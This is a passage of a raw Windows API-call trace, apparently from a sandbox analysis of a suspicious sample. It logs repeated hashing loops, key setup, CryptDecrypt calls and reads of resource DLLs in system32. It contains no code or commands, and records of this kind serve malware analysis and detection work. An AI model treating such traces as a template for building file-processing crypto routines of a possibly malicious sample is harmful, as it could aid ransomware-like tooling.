(hHash=0x3396f4a0) returned 1 [0187.923] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.923] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0187.923] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.923] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0187.923] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e828f0 [0187.923] CryptDestroyHash (hHash=0x3396f200) returned 1 [0187.923] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0187.923] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.924] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.924] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0187.924] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e825c0 [0187.924] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0187.924] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.924] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823bd0) returned 1 [0187.924] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.924] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0187.924] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82dd0 [0187.924] CryptDestroyHash (hHash=0x3396f200) returned 1 [0187.925] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0187.925] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.925] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.925] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0187.925] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e827a0 [0187.925] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.925] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.925] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0187.926] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.926] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0187.926] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82830 [0187.926] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.926] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0187.926] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0187.926] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.926] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0187.926] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82ce0 [0187.927] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.927] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0187.927] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0187.927] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.927] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0187.927] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82410 [0187.927] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0187.927] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0187.927] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.928] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.928] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0187.928] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82da0 [0187.928] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0187.928] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.928] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0187.928] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.928] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0187.928] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82c80 [0187.928] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.928] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0187.928] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0187.929] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.929] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0187.929] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82710 [0187.929] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0187.929] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0187.929] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338226d0) returned 1 [0187.932] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.932] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0187.932] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82920 [0187.932] CryptDestroyHash (hHash=0x3396f740) returned 1 [0187.932] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0187.932] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0187.933] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.933] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0187.933] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82e00 [0187.933] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.933] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0187.933] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0187.933] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.933] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0187.933] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e826b0 [0187.933] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.933] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0187.933] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.934] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.934] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0187.934] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e822c0 [0187.934] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0187.934] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.934] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.935] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.935] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0187.935] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82b90 [0187.935] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.935] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.935] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.935] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.935] CryptHashData (hHash=0x3396f740, pbData=0x32348160, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0187.935] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e827d0 [0187.935] CryptDestroyHash (hHash=0x3396f740) returned 1 [0187.935] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.935] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.936] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.936] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0187.936] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e825f0 [0187.936] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.936] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.936] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0187.937] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.937] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0187.937] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e822f0 [0187.937] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.937] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0187.937] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822cd0) returned 1 [0187.937] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.937] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0187.937] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82320 [0187.937] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0187.937] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0187.938] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823bd0) returned 1 [0187.938] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.938] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0187.938] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82950 [0187.938] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.938] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0187.938] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823bd0) returned 1 [0187.939] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.939] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0187.939] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82890 [0187.939] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.939] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0187.939] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.939] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.939] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0187.939] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82800 [0187.939] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0187.939] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.940] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0187.940] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.940] CryptHashData (hHash=0x3396f3c0, pbData=0x32348160, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0187.940] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82cb0 [0187.940] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0187.940] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0187.940] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0187.941] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.941] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82d40 [0187.941] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0187.941] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0187.941] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.942] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.942] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0187.942] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82770 [0187.942] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0187.942] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.942] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0187.942] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.942] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0187.942] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e82860 [0187.942] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.942] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0187.949] CryptSetKeyParam (hKey=0x3396f270, dwParam=0x4, pbData=0xce574*=0x1, dwFlags=0x0) returned 1 [0187.949] CryptSetKeyParam (hKey=0x3396f270, dwParam=0x1, pbData=0x32e82e60, dwFlags=0x0) returned 1 [0187.949] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x2fb5d0) returned 0x34237040 [0188.005] CryptDecrypt (in: hKey=0x3396f270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34237040, pdwDataLen=0xce55c | out: pbData=0x34237040, pdwDataLen=0xce55c) returned 0 [0188.006] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0188.006] CryptDestroyKey (hKey=0x3396f270) returned 0 [0188.006] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x34237040 | out: hHeap=0x2150000) returned 1 [0188.036] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e82e60 | out: hHeap=0x2150000) returned 1 [0188.036] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e89a30 | out: hHeap=0x2150000) returned 1 [0188.036] CloseHandle (hObject=0x640) returned 1 [0188.036] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x33ab2040 | out: hHeap=0x2150000) returned 1 [0188.053] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3204e230 | out: hHeap=0x2150000) returned 1 [0188.053] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0188.053] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3204e010 | out: hHeap=0x2150000) returned 1 [0188.053] PathFindFileNameW (pszPath="C:\\Windows\\system32\\EN\\AuthFWWizFwk.Resources.dll") returned="AuthFWWizFwk.Resources.dll" [0188.054] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x3204e010 [0188.054] GetFullPathNameW (in: lpFileName="EN\\AuthFWWizFwk.Resources.dll", nBufferLength=0x105, lpBuffer=0x3204e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\AuthFWWizFwk.Resources.dll", lpFilePart=0x0) returned 0x31 [0188.054] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AuthFWWizFwk.Resources.dll" (normalized: "c:\\windows\\system32\\en\\authfwwizfwk.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x640 [0188.054] GetFileTime (in: hFile=0x640, lpCreationTime=0xceb38, lpLastAccessTime=0xceb30, lpLastWriteTime=0xceb28 | out: lpCreationTime=0xceb38*(dwLowDateTime=0x9f38a9f5, dwHighDateTime=0x1d112f1), lpLastAccessTime=0xceb30*(dwLowDateTime=0x9f38a9f5, dwHighDateTime=0x1d112f1), lpLastWriteTime=0xceb28*(dwLowDateTime=0x9f38a9f5, dwHighDateTime=0x1d112f1)) returned 1 [0188.054] CloseHandle (hObject=0x640) returned 1 [0188.054] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xceb58 | out: lpSystemTimeAsFileTime=0xceb58*(dwLowDateTime=0xfc9a5c63, dwHighDateTime=0x1d7b3c9)) [0188.054] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x3204e230 [0188.054] GetFullPathNameW (in: lpFileName="EN\\AuthFWWizFwk.Resources.dll", nBufferLength=0x105, lpBuffer=0x3204e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\AuthFWWizFwk.Resources.dll", lpFilePart=0x0) returned 0x31 [0188.054] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x140) returned 0x32e41940 [0188.054] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AuthFWWizFwk.Resources.dll" (normalized: "c:\\windows\\system32\\en\\authfwwizfwk.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0188.054] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xdc00 [0188.054] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.054] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xdc00) returned 0x32ac5770 [0188.056] ReadFile (in: hFile=0x640, lpBuffer=0x32ac5770, nNumberOfBytesToRead=0xdc00, lpNumberOfBytesRead=0xce6a4, lpOverlapped=0x0 | out: lpBuffer=0x32ac5770*, lpNumberOfBytesRead=0xce6a4*=0xdc00, lpOverlapped=0x0) returned 1 [0188.058] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32348160 [0188.077] CryptSetKeyParam (hKey=0x3396f2e0, dwParam=0x4, pbData=0xce574*=0x1, dwFlags=0x0) returned 1 [0188.078] CryptSetKeyParam (hKey=0x3396f2e0, dwParam=0x1, pbData=0x32e7bde0, dwFlags=0x0) returned 1 [0188.078] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xdbd0) returned 0x32ad3380 [0188.078] CryptDecrypt (in: hKey=0x3396f2e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ad3380, pdwDataLen=0xce55c | out: pbData=0x32ad3380, pdwDataLen=0xce55c) returned 0 [0188.078] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0188.078] CryptDestroyKey (hKey=0x3396f2e0) returned 0 [0188.078] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ad3380 | out: hHeap=0x2150000) returned 1 [0188.078] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e7bde0 | out: hHeap=0x2150000) returned 1 [0188.078] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e7a6a0 | out: hHeap=0x2150000) returned 1 [0188.078] CloseHandle (hObject=0x640) returned 1 [0188.078] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ac5770 | out: hHeap=0x2150000) returned 1 [0188.079] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3204e230 | out: hHeap=0x2150000) returned 1 [0188.079] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41940 | out: hHeap=0x2150000) returned 1 [0188.079] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3204e010 | out: hHeap=0x2150000) returned 1 [0188.079] PathFindFileNameW (pszPath="C:\\Windows\\system32\\EN\\AutoWorkplace.Resources.dll") returned="AutoWorkplace.Resources.dll" [0188.079] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x32e806f0 [0188.079] GetFullPathNameW (in: lpFileName="EN\\AutoWorkplace.Resources.dll", nBufferLength=0x105, lpBuffer=0x32e806f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\AutoWorkplace.Resources.dll", lpFilePart=0x0) returned 0x32 [0188.079] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AutoWorkplace.Resources.dll" (normalized: "c:\\windows\\system32\\en\\autoworkplace.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x640 [0188.081] GetFileTime (in: hFile=0x640, lpCreationTime=0xceb38, lpLastAccessTime=0xceb30, lpLastWriteTime=0xceb28 | out: lpCreationTime=0xceb38*(dwLowDateTime=0x9a1229a8, dwHighDateTime=0x1d112f1), lpLastAccessTime=0xceb30*(dwLowDateTime=0x9a1229a8, dwHighDateTime=0x1d112f1), lpLastWriteTime=0xceb28*(dwLowDateTime=0x9a1229a8, dwHighDateTime=0x1d112f1)) returned 1 [0188.081] CloseHandle (hObject=0x640) returned 1 [0188.082] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xceb58 | out: lpSystemTimeAsFileTime=0xceb58*(dwLowDateTime=0xfc9e8eb7, dwHighDateTime=0x1d7b3c9)) [0188.082] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x210) returned 0x3204e010 [0188.082] GetFullPathNameW (in: lpFileName="EN\\AutoWorkplace.Resources.dll", nBufferLength=0x105, lpBuffer=0x3204e010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\EN\\AutoWorkplace.Resources.dll", lpFilePart=0x0) returned 0x32 [0188.082] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x140) returned 0x32e41940 [0188.082] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AutoWorkplace.Resources.dll" (normalized: "c:\\windows\\system32\\en\\autoworkplace.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0188.082] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1400 [0188.082] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.082] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1400) returned 0x32348160 [0188.082] ReadFile (in: hFile=0x640, lpBuffer=0x32348160, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0xce6a4, lpOverlapped=0x0 | out: lpBuffer=0x32348160*, lpNumberOfBytesRead=0xce6a4*=0x1400, lpOverlapped=0x0) returned 1 [0188.083] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32349570 [0188.085] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0188.085] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e7a6a0 [0188.085] CryptGetHashParam (in: 